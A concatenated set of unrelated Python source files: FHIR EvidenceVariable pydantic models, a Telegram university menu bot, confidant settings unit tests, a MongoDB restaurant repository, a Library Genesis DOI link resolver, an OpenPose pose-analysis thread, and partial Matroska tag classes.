element_property=True,
)
endorser: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="endorser",
title="Who endorsed the content",
description=(
"An individual or organization responsible for officially endorsing the"
" content for use in some setting."
),
# if property is element of this resource.
element_property=True,
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the evidence variable",
description=(
"A formal identifier that is used to identify this evidence variable "
"when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
jurisdiction: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="jurisdiction",
title="Intended jurisdiction for evidence variable (if applicable)",
description=(
"A legal or geographic region in which the evidence variable is "
"intended to be used."
),
# if property is element of this resource.
element_property=True,
)
lastReviewDate: fhirtypes.Date = Field(
None,
alias="lastReviewDate",
title="When the evidence variable was last reviewed",
description=(
"The date on which the resource content was last reviewed. Review "
"happens periodically after approval but does not change the original "
"approval date."
),
# if property is element of this resource.
element_property=True,
)
lastReviewDate__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_lastReviewDate", title="Extension field for ``lastReviewDate``."
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Name for this evidence variable (computer friendly)",
description=(
"A natural language name identifying the evidence variable. This name "
"should be usable as an identifier for the module by machine processing"
" applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
note: ListType[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Used for footnotes or explanatory notes",
description=(
"A human-readable string to clarify or explain concepts about the "
"resource."
),
# if property is element of this resource.
element_property=True,
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the evidence"
" variable."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
relatedArtifact: ListType[fhirtypes.RelatedArtifactType] = Field(
None,
alias="relatedArtifact",
title="Additional documentation, citations, etc.",
description=(
"Related artifacts such as additional documentation, justification, or "
"bibliographic references."
),
# if property is element of this resource.
element_property=True,
)
reviewer: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="reviewer",
title="Who reviewed the content",
description=(
"An individual or organization primarily responsible for review of some"
" aspect of the content."
),
# if property is element of this resource.
element_property=True,
)
shortTitle: fhirtypes.String = Field(
None,
alias="shortTitle",
title="Title for use in informal contexts",
description=(
"The short title provides an alternate title for use in informal "
"descriptive contexts where the full, formal title is not necessary."
),
# if property is element of this resource.
element_property=True,
)
shortTitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_shortTitle", title="Extension field for ``shortTitle``."
)
status: fhirtypes.Code = Field(
...,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this evidence variable. Enables tracking the life-cycle "
"of the content."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
subtitle: fhirtypes.String = Field(
None,
alias="subtitle",
title="Subordinate title of the EvidenceVariable",
description=(
"An explanatory or alternate title for the EvidenceVariable giving "
"additional information about its content."
),
# if property is element of this resource.
element_property=True,
)
subtitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_subtitle", title="Extension field for ``subtitle``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this evidence variable (human friendly)",
description="A short, descriptive, user-friendly title for the evidence variable.",
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
topic: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="topic",
title=(
"The category of the EvidenceVariable, such as Education, Treatment, "
"Assessment, etc."
),
description=(
"Descriptive topics related to the content of the EvidenceVariable. "
"Topics provide a high-level categorization grouping types of "
"EvidenceVariables that can be useful for filtering and searching."
),
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.Code = Field(
None,
alias="type",
title="dichotomous | continuous | descriptive",
description=(
"The type of evidence element, a population, an exposure, or an " "outcome."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["dichotomous", "continuous", "descriptive"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
url: fhirtypes.Uri = Field(
None,
alias="url",
title=(
"Canonical identifier for this evidence variable, represented as a URI "
"(globally unique)"
),
description=(
"An absolute URI that is used to identify this evidence variable when "
"it is referenced in a specification, model, design or an instance; "
"also called its canonical identifier. This SHOULD be globally unique "
"and SHOULD be a literal address at which at which an authoritative "
"instance of this evidence variable is (or will be) published. This URL"
" can be the target of a canonical reference. It SHALL remain the same "
"when the evidence variable is stored on different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate evidence variable instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the evidence variable",
description=(
"The identifier that is used to identify this version of the evidence "
"variable when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the evidence variable "
"author and is not expected to be globally unique. For example, it "
"might be a timestamp (e.g. yyyymmdd) if a managed version is not "
"available. There is also no expectation that versions can be placed in"
" a lexicographical sequence. To provide a version consistent with the "
"Decision Support Service specification, use the format "
"Major.Minor.Revision (e.g. 1.0.0). For more information on versioning "
"knowledge assets, refer to the Decision Support Service specification."
" Note that a version is required for non-experimental active "
"artifacts."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
class EvidenceVariableCharacteristic(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
What defines the members of the evidence element.
A characteristic that defines the members of the evidence element. Multiple
characteristics are applied with "and" semantics.
"""
resource_type = Field("EvidenceVariableCharacteristic", const=True)
definitionCanonical: fhirtypes.Canonical = Field(
None,
alias="definitionCanonical",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["ActivityDefinition"],
)
definitionCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_definitionCanonical",
title="Extension field for ``definitionCanonical``.",
)
definitionCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="definitionCodeableConcept",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionDataRequirement: fhirtypes.DataRequirementType = Field(
None,
alias="definitionDataRequirement",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionExpression: fhirtypes.ExpressionType = Field(
None,
alias="definitionExpression",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionReference: fhirtypes.ReferenceType = Field(
None,
alias="definitionReference",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Group"],
)
definitionTriggerDefinition: fhirtypes.TriggerDefinitionType = Field(
None,
alias="definitionTriggerDefinition",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
description: fhirtypes.String = Field(
None,
alias="description",
title="Natural language description of the characteristic",
description=(
"A short, natural language description of the characteristic that could"
" be used to communicate the criteria to an end-user."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
exclude: bool = Field(
None,
alias="exclude",
title="Whether the characteristic includes or excludes members",
description=(
"When true, members with this characteristic are excluded from the "
"element."
),
# if property is element of this resource.
element_property=True,
)
exclude__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_exclude", title="Extension field for ``exclude``."
)
groupMeasure: fhirtypes.Code = Field(
None,
alias="groupMeasure",
title=(
"mean | median | mean-of-mean | mean-of-median | median-of-mean | "
"median-of-median"
),
description=(
"Indicates how elements are aggregated within the study effective "
"period."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=[
"mean",
"median",
"mean-of-mean",
"mean-of-median",
"median-of-mean",
"median-of-median",
],
)
groupMeasure__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_groupMeasure", title="Extension field for ``groupMeasure``."
)
participantEffectiveDateTime: fhirtypes.DateTime = Field(
None,
alias="participantEffectiveDateTime",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
participantEffectiveDateTime__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_participantEffectiveDateTime",
title="Extension field for ``participantEffectiveDateTime``.",
)
participantEffectiveDuration: fhirtypes.DurationType = Field(
None,
alias="participantEffectiveDuration",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
participantEffectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="participantEffectivePeriod",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
participantEffectiveTiming: fhirtypes.TimingType = Field(
None,
alias="participantEffectiveTiming",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
timeFromStart: fhirtypes.DurationType = Field(
None,
alias="timeFromStart",
title="Observation time from study start",
description="Indicates duration from the participant's study entry.",
# if property is element of this resource.
element_property=True,
)
usageContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="usageContext",
title="What code/value pairs define members?",
description=(
"Use UsageContext to define the members of the population, such as Age "
"Ranges, Genders, Settings."
),
# if property is element of this resource.
element_property=True,
)
@root_validator(pre=True)
def validate_one_of_many(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"definition": [
"definitionCanonical",
"definitionCodeableConcept",
"definitionDataRequirement",
"definitionExpression",
"definitionReference",
"definitionTriggerDefinition",
],
"participantEffective": [
"participantEffectiveDateTime",
"participantEffectiveDuration",
"participantEffectivePeriod",
"participantEffectiveTiming",
],
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
|
StarcoderdataPython
|
5190752
|
from telegram.ext import Updater, CommandHandler, CallbackQueryHandler
import telegram
from Utils import Utils
import RuBot, BusBot, CalendarBot, CanteenBot, EventsBot, DateBot, DatabaseConnection
from conf.settings import telegramToken
import threading
ruBot = RuBot.RuBot()
canteenBot = CanteenBot.CanteenBot()
busBot = BusBot.BusBot()
calendarBot = CalendarBot.CalendarBot()
eventsBot = EventsBot.EventsBot()
dateBot = DateBot.DateBot()
databaseConnection = DatabaseConnection.DatabaseConnection()
def callHandler(bot, update):
chatType = Utils.getChatType(bot, update)
if((chatType == 'group' or chatType == 'supergroup') and not Utils.isGroupAdmin(bot, update)):
bot.answerCallbackQuery(
callback_query_id = update['callback_query']['id'],
text = 'Foi mal ' + Utils.getUserFirstName(bot, update) + ', somente admins deste grupo podem usar o bot. Se quiser utilizar o bot, chama no privado @UFFS_Bot',
show_alert = True
)
return
if update.callback_query.data == 'menu-ru':
ruBot.selectCampus(bot, update)
elif update.callback_query.data[:2] == 'RU':
ruBot.showCardapio(bot, update, update.callback_query.data[3:])
elif update.callback_query.data == 'unsub':
ruBot.unsubToPeriodicMenu(bot, update)
elif update.callback_query.data[:4] == 'AUTO':
ruBot.subToPeriodicMenu(bot, update, update.callback_query.data)
elif update.callback_query.data == 'auto-menu':
ruBot.selectPeriod(bot, update)
elif update.callback_query.data == 'daily':
ruBot.selectCampusAuto(bot, update, 'daily')
elif update.callback_query.data == 'weekly':
ruBot.selectCampusAuto(bot, update, 'weekly')
elif update.callback_query.data == 'menu-canteen':
canteenBot.selectCampus(bot, update)
elif update.callback_query.data[:7] == 'canteen':
canteenBot.showCardapio(bot, update)
elif update.callback_query.data == 'bus-schedules':
busBot.selectCampus(bot, update)
elif update.callback_query.data[:3] == 'bus':
busBot.selectStartPoint(bot, update, update.callback_query.data[4:])
elif update.callback_query.data[:13] == 'startPointBus':
busBot.showSchedule(bot, update, update.callback_query.data[14:])
elif update.callback_query.data == 'academic-calendar':
calendarBot.getCalendar(bot, update)
elif update.callback_query.data == 'events-schedules':
eventsBot.showEvents(bot, update)
elif update.callback_query.data == 'academic-date':
dateBot.selectTerm(bot, update)
elif update.callback_query.data[:4] == 'date':
dateBot.searchTerm(bot, update, update.callback_query.data[5:])
elif update.callback_query.data == 'main-menu':
Utils.showStartMenuInExistingMsg(bot, update)
def downloadNeededFiles():
calendarBot.downloadCalendar()
def main():
downloadNeededFiles()
databaseConnection.createTables()
bot = telegram.Bot(telegramToken)
updater = Updater(bot=bot)
dp = updater.dispatcher
dp.add_handler(CommandHandler('start', Utils.showStartMenu))
dp.add_handler(CommandHandler('auto', ruBot.subToPeriodicMenu))
dp.add_handler(CommandHandler('autoCancel', ruBot.unsubToPeriodicMenu))
dp.add_handler(CallbackQueryHandler(callHandler))
thread = threading.Thread(target = ruBot.sendMenuPeriodically, args = (bot,))
thread.start()
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
11366323
|
<reponame>cclauss/confidant<gh_stars>1-10
import unittest
from mock import patch
from mock import Mock
from confidant import settings
from confidant.encrypted_settings import EncryptedSettings
class EncprytedSettingsTest(unittest.TestCase):
def test_register(self):
enc_set = EncryptedSettings(None)
enc_set.register('Foo', 'Bar')
self.assertEqual(enc_set.secret_names, ['Foo'])
def test_get_registered(self):
enc_set = EncryptedSettings(None)
enc_set.register('Foo', 'Bar')
enc_set.decrypted_secrets = {'Foo': 'DecryptedBar'}
self.assertEqual(enc_set.get_secret('Foo'), 'DecryptedBar')
def test_get_registered_default(self):
enc_set = EncryptedSettings(None)
enc_set.register('Foo', 'Bar')
enc_set.register('Bar', 'Baz')
enc_set.decrypted_secrets = {'Foo': 'DecryptedFoo'}
self.assertEqual(enc_set.get_secret('Bar'), 'Baz')
@patch(
'confidant.encrypted_settings.cryptolib.decrypt_datakey',
return_value='1cVUbJT58SbMt4Wk4xmEZoNhZGdWO_vg1IJiXwc6HGs='
)
@patch(
'confidant.encrypted_settings.Fernet.decrypt',
return_value='{secret: value, secret2: value2}\n'
)
def test_bootstrap(self, mockdecryptkey, mockdecrypt):
enc_set = EncryptedSettings(None)
decrypted = enc_set._bootstrap(
'{"secrets": "encryptedstring", "data_key": "dGhla2V5"}'
)
self.assertEqual(decrypted['secret2'], 'value2')
def test_bootstrap_filefail(self):
enc_set = EncryptedSettings(None)
decrypted = enc_set._bootstrap('file://FILE/DOES/NOT/EXIST')
self.assertEqual(decrypted, {})
|
StarcoderdataPython
|
11249022
|
<reponame>WorkShoft/python-developer-delectatech
from .baserepository import BaseRepo
from restaurants.services import get_mongo_client
class MongoRestaurantRepo(BaseRepo):
client = get_mongo_client()
db = client.python_developer_db
collection = db.segment_collection
def _query(self, params={}, first=False, **kwargs):
"""
Supports one condition per field
Supports None values
Duplicates need to be removed when many records are retrieved,
because a restaurant can be embedded in several segments
params: dict
{
"popularity_rate": {"gt": 5.5},
"satisfaction_rate": {"ne": None},
}
first : bool, optional
Whether you want to retrieve one or many objects
"""
params = {
field: {f"${operator}": value for operator, value in condition.items()}
for field, condition in params.items()
}
projection = {
"_id": 0,
"restaurants": {
"$elemMatch": {
"$and": [{field: condition} for field, condition in params.items()]
}
},
}
query = [
i["restaurants"][0]
for i in self.collection.find({}, projection=projection)
if i.get("restaurants")
]
if first:
return query[0]
query_without_duplicates = [dict(i) for i in {tuple(q.items()) for q in query}]
return query_without_duplicates
|
StarcoderdataPython
|
1886020
|
import re
import json
import asyncio
import websockets
from slacker import Slacker
from conf import *
from dust import Dust
slack = Slacker(TOKEN)
response = slack.rtm.start()
sock_endpoint = response.body['url']
# Send message to slack channel
def extract_message(channel, msg):
cmd = msg.split(' ')
if CMD_PREFIX != cmd[0]:
return 'not command'
if 1 < len(cmd):
if cmd[1] == 'help':
slack.chat.post_message(channel, '@dust-attack <지역>', as_user=True)
elif bool(re.match('[가-힣]+', cmd[1])):
dust = Dust(API_KEY)
location = dust.getLocation(cmd[1])
if location == None:
slack.chat.post_message(channel, '잘못된 지역입니다.', as_user=True)
else:
aqi = dust.getDust(location)
slack.chat.post_message(channel, aqi, as_user=True)
else:
slack.chat.post_message(channel, '????', as_user=True)
else:
slack.chat.post_message(channel, '@dust-attack help', as_user=True)
# Get message from slack channel
async def execute_bot():
ws = await websockets.connect(sock_endpoint)
while True:
msg = await ws.recv()
ext_msg = json.loads(msg)
try:
if ext_msg['type'] == 'message':
extract_message(ext_msg['channel'], ext_msg['text'])
except:
pass
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(execute_bot())
asyncio.get_event_loop().run_forever()
|
StarcoderdataPython
|
5107986
|
<filename>nexus/pylon/sources/libgen_doi.py
import re
from typing import AsyncIterable
from library.logging import error_log
from nexus.pylon.exceptions import RegexNotFoundError
from .base import (
DoiSource,
PreparedRequest,
)
class LibgenDoiSource(DoiSource):
base_url = 'http://libgen.gs'
resolve_timeout = 10
async def resolve(self) -> AsyncIterable[PreparedRequest]:
async with self.get_resolve_session() as session:
url = f'{self.base_url}/scimag/ads.php?doi={self.doi}'
async with session.get(
url,
timeout=self.resolve_timeout
) as resp:
downloaded_page_bytes = await resp.read()
downloaded_page = downloaded_page_bytes.decode('utf-8', 'backslashreplace')
match = re.search(
'https?://.*/scimag/get\\.php\\?doi=.*&key=[A-Za-z0-9]+',
downloaded_page,
re.IGNORECASE,
)
if match:
yield PreparedRequest(method='get', url=match.group())
else:
error_log(RegexNotFoundError(url=url))
|
StarcoderdataPython
|
11315956
|
from ..imports.qt import QtCore, pyqtSignal, pyqtSlot
from ..imports.openpose import OPENPOSE_LOADED, OPENPOSE_MODELS_PATH
if OPENPOSE_LOADED:
from ..imports.openpose import op
import cv2
import numpy as np
def getLengthLimb(data, keypoint1: int, keypoint2: int):
if data[keypoint1, 2] > 0.0 and data[keypoint2, 2] > 0:
return np.linalg.norm([data[keypoint1, 0:2] - data[keypoint2, 0:2]])
return 0
class VideoAnalysisThread(QtCore.QThread):
newFrame = pyqtSignal(np.ndarray)
def __init__(self, videoSource):
super().__init__()
self.infoText = ""
self.personID = 0
self.running = False
self.last_frame = np.array([])
self.videoSource = videoSource
## Starting OpenPose ##
#######################
if OPENPOSE_LOADED:
params = dict()
params["model_folder"] = str(OPENPOSE_MODELS_PATH)
params["face"] = False
params["hand"] = True
params["disable_multi_thread"] = False
netRes = 15 # Default 22
params["net_resolution"] = "-1x" + str(16 * netRes)
self.opWrapper = op.WrapperPython()
self.datum = op.Datum()
self.opWrapper.configure(params)
self.opWrapper.start()
def run(self):
while OPENPOSE_LOADED:
if self.running:
frame = self.videoSource.getLastFrame()
if (type(frame) != type(None)) and not np.array_equal(
self.last_frame, frame
):
self.last_frame = frame
# Check if frame exist, frame!=None is ambigious when frame is an array
frame = self.resizeCvFrame(frame, 0.5)
self.datum.cvInputData = frame
self.opWrapper.emplaceAndPop([self.datum])
frameOutput = self.datum.cvOutputData
self.newFrame.emit(frameOutput)
@pyqtSlot(bool)
def setState(self, s: bool):
self.running = s
def getHandData(self, handID: int):
"""Return the key points of the hand seen in the image (cf. videoSource).
Args:
handID (int): 0 -> Left hand | 1 -> Right hand
Returns:
np.ndarray((3,21),float): Coordinates x, y and the accuracy score for each 21 key points.
None if the given hand is not detected.
"""
outputArray = None
handKeypoints = np.array(self.datum.handKeypoints)
nbrPersonDetected = handKeypoints.shape[1] if handKeypoints.ndim > 2 else 0
handAccuaracyScore = 0.0
if nbrPersonDetected > 0:
handAccuaracyScore = handKeypoints[handID, self.personID].T[2].sum()
handDetected = handAccuaracyScore > 1.0
if handDetected:
handKeypoints = handKeypoints[handID, self.personID]
# Initialize with the length of the first segment of each fingers
lengthFingers = [
np.sqrt(
(handKeypoints[0, 0] - handKeypoints[i, 0]) ** 2
+ (handKeypoints[0, 1] - handKeypoints[i, 1]) ** 2
)
for i in [1, 5, 9, 13, 17]
]
for i in range(3): # Add length of other segments of each fingers
for j in range(len(lengthFingers)):
x = (
handKeypoints[1 + j * 4 + i + 1, 0]
- handKeypoints[1 + j * 4 + i, 0]
)
y = (
handKeypoints[1 + j * 4 + i + 1, 1]
- handKeypoints[1 + j * 4 + i, 1]
)
lengthFingers[j] += np.sqrt(x ** 2 + y ** 2)
normMax = max(lengthFingers)
handCenterX = handKeypoints.T[0].sum() / handKeypoints.shape[0]
handCenterY = handKeypoints.T[1].sum() / handKeypoints.shape[0]
outputArray = np.array(
[
(handKeypoints.T[0] - handCenterX) / normMax,
-(handKeypoints.T[1] - handCenterY) / normMax,
(handKeypoints.T[2]),
]
)
return outputArray, handAccuaracyScore
def getBodyData(self):
outputArray = None
accuaracyScore = 0.0
if len(self.datum.poseKeypoints.shape) > 0:
# Read body data
outputArray = self.datum.poseKeypoints[self.personID]
accuaracyScore = outputArray[:, 2].sum()
# Find bouding box
min_x, max_x = float("inf"), 0.0
min_y, max_y = float("inf"), 0.0
for keypoint in outputArray:
if keypoint[2] > 0.0: # If keypoint exists in image
min_x = min(min_x, keypoint[0])
max_x = max(max_x, keypoint[0])
min_y = min(min_y, keypoint[1])
max_y = max(max_y, keypoint[1])
# Centering
np.subtract(
outputArray[:, 0],
(min_x + max_x) / 2,
where=outputArray[:, 2] > 0.0,
out=outputArray[:, 0],
)
np.subtract(
(min_y + max_y) / 2,
outputArray[:, 1],
where=outputArray[:, 2] > 0.0,
out=outputArray[:, 1],
)
# Scaling
normalizedPartsLength = np.array(
[
getLengthLimb(outputArray, 1, 8) * (16.0 / 5.2), # Torso
getLengthLimb(outputArray, 0, 1) * (16.0 / 2.5), # Neck
getLengthLimb(outputArray, 9, 10) * (16.0 / 3.6), # Right thigh
getLengthLimb(outputArray, 10, 11)
* (16.0 / 3.5), # Right lower leg
getLengthLimb(outputArray, 12, 13) * (16.0 / 3.6), # Left thigh
getLengthLimb(outputArray, 13, 14) * (16.0 / 3.5), # Left lower leg
getLengthLimb(outputArray, 2, 5) * (16.0 / 3.4), # Shoulders
]
)
# Mean of non-zero values
normalizedPartsLength = normalizedPartsLength[normalizedPartsLength > 0.0]
if len(normalizedPartsLength) > 0:
scaleFactor = np.mean(normalizedPartsLength)
else:
# print("Scaling error")
return None, 0.0
np.divide(outputArray[:, 0:2], scaleFactor, out=outputArray[:, 0:2])
if np.any((outputArray > 1.0) | (outputArray < -1.0)):
# print("Scaling error")
return None, 0.0
outputArray = outputArray.T
return outputArray, accuaracyScore
def getInfoText(self) -> str:
handKeypoints = np.array(self.datum.handKeypoints)
nbrPersonDetected = handKeypoints.shape[1] if handKeypoints.ndim > 2 else 0
self.infoText = ""
self.infoText += str(nbrPersonDetected) + (
" person detected" if nbrPersonDetected < 2 else " person detected"
)
if nbrPersonDetected > 0:
leftHandDetected = handKeypoints[0, self.personID].T[2].sum() > 1.0
rightHandDetected = handKeypoints[1, self.personID].T[2].sum() > 1.0
if rightHandDetected and leftHandDetected:
self.infoText += (
", both hands of person " + str(self.personID + 1) + " detected."
)
elif rightHandDetected or leftHandDetected:
self.infoText += (
", "
+ ("Right" if rightHandDetected else "Left")
+ " hand of person "
+ str(self.personID + 1)
+ " detected."
)
else:
self.infoText += (
", no hand of person " + str(self.personID + 1) + " detected."
)
return self.infoText
def getFingerLength(self, fingerData):
length = 0.0
for i in range(fingerData.shape[0] - 1):
x = fingerData[i + 1, 0] - fingerData[i, 0]
y = fingerData[i + 1, 1] - fingerData[i, 1]
length += np.sqrt(x ** 2 + y ** 2)
return length
def resizeCvFrame(self, frame, ratio: float):
width = int(frame.shape[1] * ratio)
height = int(frame.shape[0] * ratio)
dim = (width, height)
# resize image in down scale
resized = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)
return resized
def isRaisingHand(self):
poseKeypoints = self.getBodyData()
raisingRight = False
raisingLeft = False
if type(poseKeypoints) != type(None):
rightHand_x, rightHand_y, rightHand_a = poseKeypoints[4]
leftHand_x, leftHand_y, leftHand_a = poseKeypoints[7]
rightShoulder_x, rightShoulder_y, rightShoulder_a = poseKeypoints[2]
leftShoulder_x, leftShoulder_y, leftShoulder_a = poseKeypoints[5]
try:
shoulderSlope = (rightShoulder_y - leftShoulder_y) / (
rightShoulder_x - leftShoulder_x
)
except:
shoulderSlope = 0.0
shoulderOri = rightShoulder_y - shoulderSlope * rightShoulder_x
if leftHand_a > 0.1:
raisingLeft = leftHand_y < (
shoulderSlope * leftHand_x + shoulderOri
) # y axis oriented from top to down in images
raisingLeft = (
raisingLeft and leftHand_y < poseKeypoints[6, 1]
) # Check if hand above elbow
else:
raisingLeft = False
if rightHand_a > 0.1:
raisingRight = rightHand_y < (shoulderSlope * rightHand_x + shoulderOri)
raisingRight = raisingRight and rightHand_y < poseKeypoints[3, 1]
else:
raisingRight = False
return raisingLeft, raisingRight
|
StarcoderdataPython
|
5118662
|
from .pcan import CanBus, CanFdBus
|
StarcoderdataPython
|
6519818
|
<reponame>szrharrison/py-mkv<gh_stars>1-10
from typing import TypeVar
from lib.models.metadata.target_types import AudioTargetTypes, VideoTargetTypes, TargetTypesInt, TargetTypesStr
SimpleSubTags = TypeVar("SimpleSubTags", "TagName", "TagString", "TagDefault", "TagBinary")
TargetsSubTags = TypeVar("TargetsSubTags", "TargetType", "TargetTypeValue", "TagAttachmentUID", "TagChapterUID", "TagEditionUID", "TagTrackUID")
UIDTags = TypeVar("UIDTags", "TagChapterUID", "TagTrackUID", "TagEditionUID", "TagAttachmentUID")
Taggable = TypeVar("Taggable", "Tag", str)
class Tag:
def __init__(self, *content: Taggable):
content_strings = map(lambda tag: str(tag), content)
self.value = "\n" + indent_content("\n".join(content_strings)) + "\n"
def __str__(self):
return "<" + self.__class__.__name__ + ">" + self.value + "</" + self.__class__.__name__ + ">"
class TagBinary(TagString):
def __init__(self, content: bytearray):
super().__init__(str(content))
class SimpleTag(Tag):
def __init__(self, *content: SimpleSubTags):
self.__class__.__name__ = "SimpleTag"
super().__init__(*content)
class Targets(Tag):
def __init__(self, *content: TargetsSubTags):
super().__init__(*content)
class TargetType(TagString):
def __init__(self, content: TargetTypesStr):
super().__init__(content)
